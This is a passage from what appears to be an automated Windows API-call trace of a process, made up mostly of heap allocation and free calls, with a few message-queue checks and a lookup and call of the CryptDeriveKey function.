(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0239.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0239.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0239.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0239.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0239.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0239.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0239.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0239.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0239.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51328 [0239.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51328, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0239.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.568] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0239.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0239.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0239.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0239.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0239.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0239.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0239.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0239.569] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87090, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0239.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0239.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0239.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0239.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0239.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0239.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0239.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0239.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0239.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0239.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0239.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0239.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0239.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0239.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0239.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0239.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0239.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0239.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0239.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0239.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0239.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0239.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0239.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0239.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0239.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0239.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0239.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0239.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0239.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0239.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0239.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0239.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0239.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0239.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0239.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0239.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0239.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0239.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0239.581] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0239.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0239.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0239.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0239.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: 